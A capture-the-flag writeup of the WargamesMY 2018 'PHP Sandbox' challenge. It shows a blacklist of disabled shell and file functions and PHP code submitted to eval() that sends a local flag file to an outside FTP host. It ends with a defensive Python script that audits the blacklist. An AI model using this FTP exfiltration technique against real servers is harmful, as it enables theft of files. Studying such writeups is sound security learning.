WargamesMY CTF 2018: PHP Sandbox.
P.S. We forgot to take screenshots for the writeup on this one; luckily there was still Burp history available.
Viewing the page source, we found `<!-- source code ./source.txt -->` in an HTML comment. Viewing source.txt, we got:
Basically it is a single web page with a form that takes user input from the code parameter and passes it straight into eval().
Great! We never thought a WGMY web challenge would be this ez pz. Let's try to get RCE..
Snap! Never underestimate the troll level of the WGMY challenge author. All command execution functions are disabled. var_dump(ini_get('disable_functions')); reveals every disabled function:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,shell_exec,proc_open,popen,system,passthru,file_get_contents,readfile,fopen,ini_set,fgets,include,include_once,require,require_once,fgetcsv,parse_ini_file,rename,copy,symlink,fseek,file,file_exists,delete,chmod,fpassthru,freed,fscanf,stream_wrapper_register,stream_wrapper_restore,fsockopen,pfsockopen,curl_init,stream_context_create,show_source,highlight_file,sleep,token_get_all,yaml_parse_file
So that explains why the challenge is named PHP Sandbox.
Later we found scandir() is still usable, and it reveals the target flag file .supers3cr37file.php in the same www directory.
Most of the file read/view functions are also disabled (maybe not all; we just could not think of any others at the time). Later we found the FTP functions are usable. The idea is to transfer the flag back to us via FTP, so we ran an FTP server on our box.
```php
/* Submitted via the code parameter straight into eval(), so no opening <?php tag */
$remote_file = 'flagphpsandbox.txt';

/* FTP account on our box */
$ftp_host = '60.52.67.38';          /* host */
$ftp_user_name = 'ayamkambing';     /* username */
$ftp_user_pass = 'wgmy2018';        /* password */

/* Local file to send: the flag file found with scandir() */
$local_file = '/var/www/html/.supers3cr37file.php';

/* Connect using basic FTP */
$connect_it = ftp_connect( $ftp_host );

/* Login to FTP */
$login_result = ftp_login( $connect_it, $ftp_user_name, $ftp_user_pass );

/* Upload $local_file to our server as $remote_file */
if ( ftp_put( $connect_it, $remote_file, $local_file, FTP_BINARY ) ) {
    echo "WOOT! Successfully uploaded $local_file as $remote_file\n";
} else {
    echo "Doh! There was a problem\n";
}

/* Close the connection */
ftp_close( $connect_it );
```
Submit the above code as the code parameter.
The flag file was successfully transferred to our box, and finally:
$ cat flagphpsandbox.txt
<?php /*$flag = 'wgmy{func_bl4ck1ist_1z_s0_b4d}';*/ ?>
Flag : wgmy{func_bl4ck1ist_1z_s0_b4d}
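The flag spells out the lesson: a function blacklist is only as good as its coverage. Below is an added audit script (not part of the original writeup) that parses a php.ini disable_functions value, reports which of the functions this writeup relied on are still callable, and flags listed names that are language constructs, which disable_functions cannot block at all. The disable_functions value is the one recovered above; the construct set is illustrative, not exhaustive.

```python
"""Audit a PHP disable_functions blacklist the way a defender would after
this challenge.  Added example, not code from the original writeup."""
import re

# Value recovered from the challenge via var_dump(ini_get('disable_functions')).
PAGE_DISABLE_FUNCTIONS = (
    "pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,"
    "pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,"
    "pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,"
    "pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,"
    "exec,shell_exec,proc_open,popen,system,passthru,file_get_contents,readfile,fopen,"
    "ini_set,fgets,include,include_once,require,require_once,fgetcsv,parse_ini_file,"
    "rename,copy,symlink,fseek,file,file_exists,delete,chmod,fpassthru,freed,fscanf,"
    "stream_wrapper_register,stream_wrapper_restore,fsockopen,pfsockopen,curl_init,"
    "stream_context_create,show_source,highlight_file,sleep,token_get_all,yaml_parse_file"
)

# Names the writeup showed were still usable from inside eval(): directory
# listing plus the FTP client, which reads a local file and ships it out.
USED_IN_WRITEUP = ["scandir", "ftp_connect", "ftp_login", "ftp_put", "ftp_close"]

# Language constructs, not functions: disable_functions has no effect on them,
# so listing them gives a false sense of coverage (set is illustrative only).
CONSTRUCTS = {"eval", "include", "include_once", "require", "require_once"}


def parse_disable_functions(value: str) -> set:
    """Accept a raw value or a full 'disable_functions = "..."' ini line.
    PHP function names are case-insensitive, so normalise to lowercase."""
    value = value.strip()
    m = re.match(r"^disable_functions\s*=\s*(.*)$", value, re.IGNORECASE)
    if m:
        value = m.group(1).strip()
    value = value.strip("\"'")
    return {n.strip().lower() for n in re.split(r"[,\s]+", value) if n.strip()}


def audit(value: str, wanted=USED_IN_WRITEUP) -> dict:
    """Return which wanted names are still callable and which listed entries
    are constructs, so the result can be asserted on rather than only printed."""
    disabled = parse_disable_functions(value)
    return {
        "still_callable": [n for n in wanted if n.lower() not in disabled],
        "ineffective_entries": sorted(disabled & CONSTRUCTS),
    }


if __name__ == "__main__":
    report = audit(PAGE_DISABLE_FUNCTIONS)
    print("still callable:", ", ".join(report["still_callable"]))
    print("no-op entries :", ", ".join(report["ineffective_entries"]))
```

Running it against the challenge value lists all five FTP/scandir names as still callable and the four include/require entries as no-ops.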
References: PHP Scandir Function